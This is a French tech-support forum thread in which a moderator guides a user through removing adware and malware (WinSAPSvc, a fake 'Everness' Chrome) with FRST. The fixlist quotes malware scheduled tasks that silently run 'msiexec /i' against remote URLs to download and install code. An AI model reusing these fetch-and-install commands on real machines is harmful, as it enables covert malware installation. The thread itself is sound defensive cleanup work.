Virus WinSAPSvc et Everness
Résolu
dodda11
Messages postés
4
Date d'inscription
Statut
Membre
Dernière intervention
-
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour,
Ces derniers jours mon PC connait une lenteur anormale, je crois qu'il est infecté.
J'ai effectué hier un scan avec ZHPDiag. Vous trouverez ci-dessous le lien pour accéder à ce rapport:
http://www..com/c/GDEacJmSJIw
Je vous prie de m'aider le plutot possible car mon PC devient presque inutilisable.
Merci d'avance pour votre aide et assistance.
Ces derniers jours mon PC connait une lenteur anormale, je crois qu'il est infecté.
J'ai effectué hier un scan avec ZHPDiag. Vous trouverez ci-dessous le lien pour accéder à ce rapport:
http://www..com/c/GDEacJmSJIw
Je vous prie de m'aider le plutot possible car mon PC devient presque inutilisable.
Merci d'avance pour votre aide et assistance.
A voir également:
- Virus WinSAPSvc et Everness
- Virus mcafee - Accueil - Piratage
- Virus facebook demande d'amis - Accueil - Facebook
- Undisclosed-recipients virus - Guide
- Panda anti virus gratuit - Télécharger - Antivirus & Antimalwares
- Softonic virus ✓ - Forum Logiciels
5 réponses
Salut,
Pas de virus, à priori, plutôt des programmes inutiles qui ralentissent Windows.
Désinstalle YAC(Yet Another Cleaner!
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Pas de virus, à priori, plutôt des programmes inutiles qui ralentissent Windows.
Désinstalle YAC(Yet Another Cleaner!
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Bonsoir Malekal,
Je te remercie beaucoup pour ton assistance.
J'ai désinstallé YAC(Yet Another Cleaner! et j'ai lancé le scan FRST.
Merci de trouver les rapports générés dans les liens ci-dessous:
• FRST.txt : https://pjjoint.malekal.com/files.php?id=FRST_20170501_u9t10q13s11u9
• Shortcut.txt : https://pjjoint.malekal.com/files.php?id=20170501_j11o7h11l12c15
• Additionnal.txt : https://pjjoint.malekal.com/files.php?id=20170501_h5u13b10s14m15
Merci,
Je te remercie beaucoup pour ton assistance.
J'ai désinstallé YAC(Yet Another Cleaner! et j'ai lancé le scan FRST.
Merci de trouver les rapports générés dans les liens ci-dessous:
• FRST.txt : https://pjjoint.malekal.com/files.php?id=FRST_20170501_u9t10q13s11u9
• Shortcut.txt : https://pjjoint.malekal.com/files.php?id=20170501_j11o7h11l12c15
• Additionnal.txt : https://pjjoint.malekal.com/files.php?id=20170501_h5u13b10s14m15
Merci,
En fait, l'ordinateur est infecté =)
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Si tu as des problèmes de pubs et autres, indique sur quel navigateur WEB.
Refais un scan FRST et donne les rapports via pjjoint.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
Task: {1B451D2E-B6D9-4374-8942-94158CDE6CA0} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST9320423AS_5VJ9J9JT&d=20170426 /q <==== ATTENTION
Task: {4A38B675-8E94-4AD9-9EB4-6D83F74E3AF7} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {C5959D44-60BA-4F84-821B-2AC157388AD4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-04-28] () <==== ATTENTION
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\Moumni Bros\Desktop\ALL\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.bahaty.com/red/e.php
ShortcutWithArgument: C:\Users\Moumni Bros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\cfa384dbd06217b1\Google Chrome.lnk -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
ShortcutWithArgument: C:\Users\Moumni Bros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
ShellExecuteHooks: Pas de nom - {EB57AAF0-235E-11E7-8087-64006A5CFC23} - C:\Users\Moumni Bros\AppData\Roaming\Atawerward\Zobalebueent.dll -> Pas de fichier
CHR Extension: (Visiteurs pour Facebook) - C:\Users\Moumni Bros\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihjbpjahiibmjdlcgodcnmpelpmilamk [2017-02-15]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-27] () <==== ATTENTION
R2 HPSLPSVC; C:\Users\Moumni Bros\AppData\Local\Temp\7zS1010\hpslpsvc64.dll [1039360 2015-09-21] (Hewlett-Packard Co.) [Fichier non signé] <==== ATTENTION
R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Fichier non signé]
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe (Google Inc.) <==== ATTENTION
S4 WinSAPSvc; C:\Users\Moumni Bros\AppData\Roaming\WinSAPSvc\WinSAP.dll [550912 2017-04-29] () [Fichier non signé] <==== ATTENTION
2017-04-27 22:07 - 2017-04-27 22:07 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\Firefox
2017-04-27 22:07 - 2017-04-27 22:07 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Firefox
2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Everness
2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\ProgramData\Apple
2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-27 22:05 - 2017-04-27 22:05 - 00000000 ____D C:\Program Files (x86)\Everness
2017-04-27 13:21 - 2017-04-27 13:21 - 00003480 _____ C:\WINDOWS\System32\Tasks\T0528
2017-04-27 13:16 - 2017-04-27 13:16 - 00000000 ____D C:\WINDOWS\system32\log
2017-04-27 13:16 - 2016-05-23 03:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-04-27 13:16 - 2016-05-19 07:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-04-27 13:15 - 2017-05-01 00:20 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-27 13:15 - 2017-05-01 00:00 - 00000299 _____ C:\Users\Public\Documents\temp.dat
2017-04-27 13:15 - 2017-04-27 13:15 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-27 13:15 - 2017-04-27 13:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-26 12:47 - 2017-04-26 12:47 - 00003948 _____ C:\WINDOWS\System32\Tasks\Samsung Update
2017-04-26 12:47 - 2017-04-26 12:47 - 00000000 ____D C:\Insist
2017-04-25 12:58 - 2017-04-27 12:57 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-25 12:47 - 2017-04-28 12:55 - 00003566 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-04-25 12:47 - 2017-04-28 12:55 - 00003516 _____ C:\WINDOWS\System32\Tasks\Windows-PG
2017-04-25 12:47 - 2017-04-28 12:55 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\SNARE
2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\WINDOWS\psgo
2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Kitty
2017-04-25 12:47 - 2017-04-25 12:47 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-25 12:46 - 2017-04-28 13:00 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\WinSAPSvc
2017-04-25 12:45 - 2017-04-28 12:54 - 00000000 ____D C:\Program Files\MK
2017-04-25 12:45 - 2017-04-25 12:45 - 00000000 ____D C:\Program Files (x86)\eg0f32gu
2017-04-25 00:23 - 2017-04-29 12:44 - 00005622 _____ C:\ProgramData\log.ewbt
2017-04-25 00:23 - 2017-04-29 12:44 - 00000128 _____ C:\ProgramData\log.ewbb
2017-04-25 00:23 - 2017-04-28 13:00 - 00000000 ____D C:\Program Files (x86)\Rasupy
2017-04-25 00:23 - 2017-04-27 21:59 - 00000000 ____D C:\Users\Moumni Bros\AppData\Roaming\Atawerward
2017-04-25 00:23 - 2017-04-25 00:26 - 00000000 ____D C:\Users\Moumni Bros\AppData\Local\Kehige
2017-04-25 00:23 - 2017-04-25 00:23 - 00006012 _____ C:\WINDOWS\System32\Tasks\Gacekzapry System
2017-04-25 00:23 - 2017-04-25 00:23 - 00005984 _____ C:\WINDOWS\System32\Tasks\Mmersh
2017-04-25 00:23 - 2017-04-25 00:23 - 00000000 ____D C:\Program Files (x86)\Gacekzapry System
2017-04-25 00:17 - 2017-04-30 12:06 - 00000000 ____D C:\Users\Moumni Bros\AppData\LocalLow\Mozilla
2017-04-25 00:13 - 2017-04-25 00:13 - 00000000 ____D C:\Users\Moumni Bros\licman
2017-04-25 00:13 - 2017-04-25 00:13 - 00000000 ____D C:\Users\Moumni Bros\ERHome64
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Si tu as des problèmes de pubs et autres, indique sur quel navigateur WEB.
Refais un scan FRST et donne les rapports via pjjoint.
Bonjour,
Merci beaucoup pour ton assistance.
J'ai effectué toutes les étapes demandées et mon ordinateur va mieux maintenant :D
Merci de trouver ci dessous les rapports du scan FRST:
- FRST : https://pjjoint.malekal.com/files.php?id=FRST_20170501_w6o12o15o10e10
- Additionnal: https://pjjoint.malekal.com/files.php?id=20170501_f9d8i8b7f6
- Shortcut: https://pjjoint.malekal.com/files.php?id=20170501_m9i10b10l14r14
Merci,
Merci beaucoup pour ton assistance.
J'ai effectué toutes les étapes demandées et mon ordinateur va mieux maintenant :D
Merci de trouver ci dessous les rapports du scan FRST:
- FRST : https://pjjoint.malekal.com/files.php?id=FRST_20170501_w6o12o15o10e10
- Additionnal: https://pjjoint.malekal.com/files.php?id=20170501_f9d8i8b7f6
- Shortcut: https://pjjoint.malekal.com/files.php?id=20170501_m9i10b10l14r14
Merci,
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
super,
à supprimer : C:\ProgramData\RegisterObject
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
à supprimer : C:\ProgramData\RegisterObject
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
